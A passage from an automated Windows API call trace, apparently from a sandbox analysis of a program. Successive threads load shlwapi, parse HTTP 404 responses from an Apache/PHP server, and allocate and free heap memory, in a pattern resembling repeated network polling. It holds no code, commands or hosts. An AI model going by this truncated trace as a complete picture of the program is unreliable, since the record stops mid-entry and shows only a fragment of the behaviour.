Flags=0x0, Size=0x10) returned 0x63eb50 [0164.952] GetProcessHeap () returned 0x620000 [0164.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0164.952] GetProcessHeap () returned 0x620000 [0164.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 56 os_tid = 0x120c [0166.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0166.753] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:09 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0166.753] GetProcessHeap () returned 0x620000 [0166.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0166.754] GetProcessHeap () returned 0x620000 [0166.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0166.754] GetProcessHeap () returned 0x620000 [0166.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 57 os_tid = 0x121c [0168.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0168.479] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:11 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0168.479] GetProcessHeap () returned 0x620000 [0168.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0168.479] GetProcessHeap () returned 0x620000 [0168.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0168.479] GetProcessHeap () returned 0x620000 [0168.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 58 os_tid = 0x1200 [0170.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0170.392] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:12 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0170.392] GetProcessHeap () returned 0x620000 [0170.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0170.392] GetProcessHeap () returned 0x620000 [0170.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0170.392] GetProcessHeap () returned 0x620000 [0170.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 Thread: id = 59 os_tid = 0x1350 [0171.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0171.714] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:14 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0171.714] GetProcessHeap () returned 0x620000 [0171.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0171.714] GetProcessHeap () returned 0x620000 [0171.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0171.714] GetProcessHeap () returned 0x620000 [0171.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 Thread: id = 60 os_tid = 0x134c [0173.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0173.666] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:16 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0173.666] GetProcessHeap () returned 0x620000 [0173.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0173.666] GetProcessHeap () returned 0x620000 [0173.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0173.666] GetProcessHeap () returned 0x620000 [0173.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 Thread: id = 61 os_tid = 0x1340 [0175.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0175.457] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:18 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0175.458] GetProcessHeap () returned 0x620000 [0175.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0175.458] GetProcessHeap () returned 0x620000 [0175.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0175.458] GetProcessHeap () returned 0x620000 [0175.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 Thread: id = 62 os_tid = 0x1348 [0177.310] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0177.311] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:20 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0177.311] GetProcessHeap () returned 0x620000 [0177.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0177.311] GetProcessHeap () returned 0x620000 [0177.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0177.311] GetProcessHeap () returned 0x620000 [0177.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 Thread: id = 63 os_tid = 0x1344 [0179.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0179.236] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:21 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0179.236] GetProcessHeap () returned 0x620000 [0179.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0179.236] GetProcessHeap () returned 0x620000 [0179.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0179.236] GetProcessHeap () returned 0x620000 [0179.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 Thread: id = 64 os_tid = 0x133c [0181.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0181.098] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:23 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0181.098] GetProcessHeap () returned 0x620000 [0181.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0181.098] GetProcessHeap () returned 0x620000 [0181.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0181.098] GetProcessHeap () returned 0x620000 [0181.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 Thread: id = 65 os_tid = 0x11f8 [0182.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0182.363] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:25 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0182.364] GetProcessHeap () returned 0x620000 [0182.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0182.364] GetProcessHeap () returned 0x620000 [0182.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0182.365] GetProcessHeap () returned 0x620000 [0182.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 Thread: id = 66 os_tid = 0x1068 [0184.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0184.201] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:26 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0184.201] GetProcessHeap () returned 0x620000 [0184.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0184.201] GetProcessHeap () returned 0x620000 [0184.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0184.201] GetProcessHeap () returned 0x620000 [0184.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 67 os_tid = 0xb68 [0186.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0186.050] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:28 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0186.050] GetProcessHeap () returned 0x620000 [0186.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0186.050] GetProcessHeap () returned 0x620000 [0186.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0186.051] GetProcessHeap () returned 0x620000 [0186.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 68 os_tid = 0xca4 [0187.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0187.301] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:30 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0187.301] GetProcessHeap () returned 0x620000 [0187.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0187.301] GetProcessHeap () returned 0x620000 [0187.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0187.301] GetProcessHeap () returned 0x620000 [0187.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 69 os_tid = 0x934 [0189.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0189.260] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:31 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0189.261] GetProcessHeap () returned 0x620000 [0189.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0189.261] GetProcessHeap () returned 0x620000 [0189.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0189.261] GetProcessHeap () returned 0x620000 [0189.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 70 os_tid = 0xba4 [0191.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0191.051] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:33 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0191.051] GetProcessHeap () returned 0x620000 [0191.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0191.051] GetProcessHeap () returned 0x620000 [0191.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0191.051] GetProcessHeap () returned 0x620000 [0191.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 71 os_tid = 0x488 [0193.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0193.205] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:35 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0193.205] GetProcessHeap () returned 0x620000 [0193.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0193.205] GetProcessHeap () returned 0x620000 [0193.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0193.205] GetProcessHeap () returned 0x620000 [0193.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 72 os_tid = 0xb50 [0195.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0195.123] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:37 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0195.124] GetProcessHeap () returned 0x620000 [0195.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0195.124] GetProcessHeap () returned 0x620000 [0195.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0195.124] GetProcessHeap () returned 0x620000 [0195.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 73 os_tid = 0x77c [0196.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0196.686] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:39 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0196.686] GetProcessHeap () returned 0x620000 [0196.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb80 [0196.686] GetProcessHeap () returned 0x620000 [0196.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb80 | out: hHeap=0x620000) returned 1 [0196.686] GetProcessHeap () returned 0x620000 [0196.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 74 os_tid = 0xaa8 [0198.583] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0198.584] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:41 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0198.584] GetProcessHeap () returned 0x620000 [0198.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0198.584] GetProcessHeap () returned 0x620000 [0198.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0198.584] GetProcessHeap () returned 0x620000 [0198.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 75 os_tid = 0xb58 [0200.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0200.399] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:43 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0200.399] GetProcessHeap () returned 0x620000 [0200.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0200.399] GetProcessHeap () returned 0x620000 [0200.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0200.399] GetProcessHeap () returned 0x620000 [0200.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 76 os_tid = 0x2d0 [0201.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0201.674] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:44 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0201.674] GetProcessHeap () returned 0x620000 [0201.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0201.674] GetProcessHeap () returned 0x620000 [0201.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0201.674] GetProcessHeap () returned 0x620000 [0201.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 77 os_tid = 0x628 [0203.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0203.419] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:46 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0203.419] GetProcessHeap () returned 0x620000 [0203.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0203.419] GetProcessHeap () returned 0x620000 [0203.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0203.419] GetProcessHeap () returned 0x620000 [0203.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 78 os_tid = 0x514 [0205.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0205.185] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:47 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0205.185] GetProcessHeap () returned 0x620000 [0205.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0205.185] GetProcessHeap () returned 0x620000 [0205.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0205.185] GetProcessHeap () returned 0x620000 [0205.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 79 os_tid = 0x8ac [0206.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0206.600] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:49 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0206.600] GetProcessHeap () returned 0x620000 [0206.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0206.600] GetProcessHeap () returned 0x620000 [0206.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0206.600] GetProcessHeap () returned 0x620000 [0206.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 80 os_tid = 0x734 [0208.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0208.477] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:51 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0208.477] GetProcessHeap () returned 0x620000 [0208.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0208.477] GetProcessHeap () returned 0x620000 [0208.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0208.477] GetProcessHeap () returned 0x620000 [0208.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 81 os_tid = 0x39c [0210.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0210.420] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:53 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0210.420] GetProcessHeap () returned 0x620000 [0210.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0210.420] GetProcessHeap () returned 0x620000 [0210.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0210.420] GetProcessHeap () returned 0x620000 [0210.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 82 os_tid = 0x548 [0212.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0212.657] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:54 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0212.657] GetProcessHeap () returned 0x620000 [0212.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0212.657] GetProcessHeap () returned 0x620000 [0212.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0212.657] GetProcessHeap () returned 0x620000 [0212.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 83 os_tid = 0x354 [0213.694] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0213.694] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:57 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0213.695] GetProcessHeap () returned 0x620000 [0213.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0213.695] GetProcessHeap () returned 0x620000 [0213.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0213.695] GetProcessHeap () returned 0x620000 [0213.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 84 os_tid = 0xa34 [0215.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0215.611] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:58 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0215.611] GetProcessHeap () returned 0x620000 [0215.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0215.611] GetProcessHeap () returned 0x620000 